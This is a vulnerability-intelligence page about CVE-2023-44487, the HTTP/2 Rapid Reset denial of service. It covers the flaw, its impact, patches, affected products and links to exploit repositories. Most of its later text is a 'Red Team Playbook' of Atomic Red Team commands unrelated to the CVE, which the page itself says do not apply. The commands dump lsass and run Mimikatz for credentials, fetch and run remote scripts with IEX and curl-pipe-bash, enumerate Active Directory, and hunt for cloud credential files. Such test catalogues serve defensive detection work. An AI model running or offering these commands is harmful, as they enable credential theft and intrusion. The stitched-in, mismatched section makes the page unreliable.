CVE-2023-44487
Overview
This vulnerability is a denial of service condition rooted in the HTTP/2 protocol's handling of stream cancellation. Specifically, the protocol allows rapid resetting of multiple concurrent streams via request cancellation frames, which can overwhelm server resources. The affected component is the HTTP/2 stream management mechanism responsible for processing reset stream frames, leading to excessive consumption of server-side resources.
Vulnerability Description
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
Impact
An unauthenticated attacker can remotely trigger rapid stream resets to exhaust server resources, causing denial of service and service unavailability. This attack requires no user interaction or credentials and can disrupt critical industrial control systems and network infrastructure relying on affected Siemens firmware and software. The resulting service disruption can impact operational continuity and availability of industrial automation environments and cloud services utilizing vulnerable HTTP/2 stacks.
Solution
Apply the security updates referenced in Debian security advisories DSA-5521 and DSA-5522, and corresponding Fedora package updates announced in the Fedora mailing lists. Siemens customers should update affected Simatic S7-1500 CPU 1518F-4 PN/DP MFP firmware and Sinec INS software to the latest vendor-provided versions. Detailed patch instructions and version information are available in the Debian and Fedora advisories and Siemens vendor communications. AWS users should refer to AWS Security Bulletin AWS-2023-011 for mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the HTTP/2 protocol arises from its handling of request cancellations, which can lead to significant server resource consumption. Specifically, when a client cancels a request, it can trigger a reset of multiple streams in rapid succession. This behavior can overwhelm server resources, leading to denial-of-service (DoS) conditions. The nature of HTTP/2 allows for multiplexing multiple streams over a single connection, which, while efficient, can be exploited if a malicious actor intentionally sends numerous cancellation requests. This results in excessive resource utilization, potentially exhausting server capacity and degrading service availability.
Attack vectors for this vulnerability primarily involve the manipulation of HTTP/2 connections. An attacker can craft a series of requests that are quickly canceled, resulting in a flood of reset signals sent to the server. This can be executed from a single client or through a distributed approach using multiple clients to amplify the effect. Exploitation scenarios may include targeting high-traffic web applications or services that rely heavily on HTTP/2 for performance. By overwhelming the server with cancellation requests, an attacker can disrupt normal operations, leading to service outages or degraded performance for legitimate users.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on web applications and services for revenue generation and customer engagement. A successful denial-of-service attack can lead to lost revenue, diminished customer trust, and potential reputational damage. Furthermore, the operational costs associated with mitigating such attacks can strain resources, especially for organizations that lack robust incident response capabilities. The ability to disrupt services during peak usage times can have cascading effects on business operations, making this vulnerability a critical concern for organizations across various sectors.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Monitoring tools that analyze traffic patterns can help identify unusual spikes in request cancellations or resets, allowing for early detection of potential exploitation attempts. Rate limiting and request validation mechanisms can be employed to control the number of cancellation requests a client can send within a specific timeframe, thereby reducing the likelihood of resource exhaustion. Additionally, updating affected products to the latest versions, which may include patches or improvements to handle such scenarios more gracefully, is essential for maintaining a secure environment.
In conclusion, the vulnerability within the HTTP/2 protocol presents a tangible threat to server resources and overall service availability. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against exploitation. Implementing effective detection and mitigation strategies will not only protect against this specific vulnerability but also enhance the overall resilience of their web applications and services against future threats.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-44487, reflected by a modest uptick in telemetry signals. This subtle rise indicates that threat actors continue to probe and leverage the HTTP/2 Rapid Reset vulnerability as part of their resource exhaustion tactics. Concurrently, the emergence of new proof-of-concept tools and frameworks designed to facilitate multi-vector DDoS attacks incorporating this vulnerability underscores a growing sophistication in offensive capabilities. While the overall exploit trend remains stable, these developments suggest attackers are refining their methods to maximize impact and evade detection. For defenders, this evolving landscape heightens the urgency to monitor HTTP/2 traffic anomalies closely and reinforces the criticality of maintaining robust detection mechanisms. Although the risk level remains high due to the vulnerability’s inherent severity and widespread protocol use, the incremental increase in exploitation activity and advanced tooling signals a persistent and adaptive threat environment that demands continued vigilance.
Affected Products (292)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ietf | Http | 2.0 |
cpe:2.3:a:ietf:http:2.0:*:*:*:*:*:*:*
|
|
|
Nghttp2 | Nghttp2 | All |
cpe:2.3:a:nghttp2:nghttp2:*:*:*:*:*:*:*:*
|
|
|
Netty | Netty | All |
cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*
|
|
|
Envoyproxy | Envoy | 1.24.10 |
cpe:2.3:a:envoyproxy:envoy:1.24.10:*:*:*:*:*:*:*
|
|
|
Envoyproxy | Envoy | 1.25.9 |
cpe:2.3:a:envoyproxy:envoy:1.25.9:*:*:*:*:*:*:*
|
|
|
Envoyproxy | Envoy | 1.26.4 |
cpe:2.3:a:envoyproxy:envoy:1.26.4:*:*:*:*:*:*:*
|
|
|
Envoyproxy | Envoy | 1.27.0 |
cpe:2.3:a:envoyproxy:envoy:1.27.0:*:*:*:*:*:*:*
|
|
|
Eclipse | Jetty | All |
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
|
|
|
Eclipse | Jetty | All |
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
|
|
|
Eclipse | Jetty | All |
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
|
|
|
Eclipse | Jetty | All |
cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
|
|
|
Caddyserver | Caddy | All |
cpe:2.3:a:caddyserver:caddy:*:*:*:*:*:*:*:*
|
|
|
Golang | Go | All |
cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*
|
|
|
Golang | Go | All |
cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*
|
|
|
Golang | Http2 | All |
cpe:2.3:a:golang:http2:*:*:*:*:*:go:*:*
|
|
|
Golang | Networking | All |
cpe:2.3:a:golang:networking:*:*:*:*:*:go:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| HTTP/2 2.0 - Denial Of Service (DOS) | Madhusudhan Rajappa | remote | multiple | - | View |
GitHub PoCs (27)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
bcdannyboy/CVE-2023-44487
Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487
|
bcdannyboy | 246 | 47 | 2023-10-10 | View |
|
secengjeff/rapidresetclient
Tool for testing mitigations and exposure to Rapid Reset DDoS (CVE-2023-44487)
|
secengjeff | 75 | 16 | 2023-10-13 | View |
|
Appsynergy-io/CVE-2023-44487
Proof of concept for DoS exploit
|
Appsynergy-io | 56 | 16 | 2023-10-11 | View |
|
studiogangster/CVE-2023-44487
A python based exploit to test out rapid reset attack (CVE-2023-44487)
|
studiogangster | 21 | 3 | 2023-10-16 | View |
|
nxenon/cve-2023-44487
Examples for Implementing cve-2023-44487 ( HTTP/2 Rapid Reset Attack ) Concept
|
nxenon | 16 | 1 | 2023-11-10 | View |
|
threatlabindonesia/CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC
|
threatlabindonesia | 9 | 2 | 2024-12-03 | View |
|
ndrscodes/http2-rst-stream-attacker
Highly configurable tool to check a server's vulnerability against CVE-2023-44487 by rapidly sending HEADERS and RST_STR...
|
ndrscodes | 6 | 2 | 2023-11-08 | View |
|
moften/CVE-2023-44487-HTTP-2-Rapid-Reset-Attack
HTTP/2 Rapid Reset Exploit PoC
|
moften | 2 | 1 | 2025-04-14 | View |
|
tpirate/cve-2023-44487-POC
poc for the rst dos attack discovered in 2023
|
tpirate | 2 | 0 | 2025-12-14 | View |
|
zanks08/cve-2023-44487-demo
Demo for detection and mitigation of HTTP/2 Rapid Reset vulnerability (CVE-2023-44487)
|
zanks08 | 1 | 1 | 2025-04-22 | View |
|
ReToCode/golang-CVE-2023-44487
|
ReToCode | 2 | 0 | 2023-10-25 | View |
|
aulauniversal/CVE-2023-44487
RapidResetClient
|
aulauniversal | 1 | 0 | 2025-01-18 | View |
|
madhantr0/http2-security-lab
HTTP/2 attack simulation & defense lab - Slowloris, Rapid Reset (CVE-2023-44487), HPACK Bomb attacks with 5 layered defe...
|
madhantr0 | 0 | 0 | 2026-06-06 | View |
|
Hirokiii/CVE-2023-44487
Educational environment for LTAT.04.022 Homework 4.
|
Hirokiii | 0 | 0 | 2026-05-15 | View |
|
galletitaconpate/CVE-2023-44487
CVE-2023-44487
|
galletitaconpate | 0 | 0 | 2026-04-24 | View |
|
TLevente20/HTTP-2-RapidReset-CVE-2023-44487-Testlab
|
TLevente20 | 0 | 0 | 2026-04-01 | View |
|
ReGeLePuMa/HTTP-2-Rapid-Reset-DDos
PoC for HTTP/2 Rapid Reset DDoS Vulnerability - CVE-2023-44487
|
ReGeLePuMa | 0 | 0 | 2025-12-23 | View |
|
dryfryce/phoenix-http2
Phoenix — Rust HTTP/2 stress testing & attack simulation framework. CVE-2023-44487, CONTINUATION Flood, HPACK Bomb and m...
|
dryfryce | 0 | 0 | 2026-03-03 | View |
|
ByteHackr/CVE-2023-44487
Test Script for CVE-2023-44487
|
ByteHackr | 0 | 0 | 2023-10-12 | View |
|
TYuan0816/cve-2023-44487
|
TYuan0816 | 0 | 0 | 2024-04-22 | View |
|
pabloec20/rapidreset
CVE-2023-44487
|
pabloec20 | 0 | 0 | 2023-10-12 | View |
|
sigridou/CVE-2023-44487-
|
sigridou | 0 | 0 | 2023-12-11 | View |
|
sn130hk/CVE-2023-44487
|
sn130hk | 0 | 0 | 2024-05-26 | View |
|
dryfryce/phoenix-h2
🔥 Phoenix — Rust HTTP/2 stress testing & security research framework. CVE-2023-44487, CONTINUATION Flood, HPACK Bomb and...
|
dryfryce | 0 | 0 | 2026-03-03 | View |
|
sastraadiwiguna-purpleeliteteaming/DDoS-Purple-Teaming-Offensive-Multi-Vector-7-Tier-Defensive-Holistic-Blueprint-
Replicable Blueprint for advanced DDoS Purple Teaming, engineered for the threat landscape. It integrates a Red Elite Te...
|
sastraadiwiguna-purpleeliteteaming | 0 | 0 | 2026-01-18 | View |
|
BMG-Black-Magic/CVE-2023-44487
POC for CVE-2023-44487
|
BMG-Black-Magic | 0 | 0 | 2025-02-19 | View |
|
madhusudhan-in/CVE_2023_44487-Rapid_Reset
A comprehensive Python testing tool for CVE-2023-44487, the HTTP/2 Rapid Reset vulnerability. This enhanced version prov...
|
madhusudhan-in | 0 | 0 | 2025-07-23 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-492 | Regular Expression Exponential Blowup |
30%
|
— | — | |
| CAPEC-227 | Sustained Client Engagement |
30%
|
— | — |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
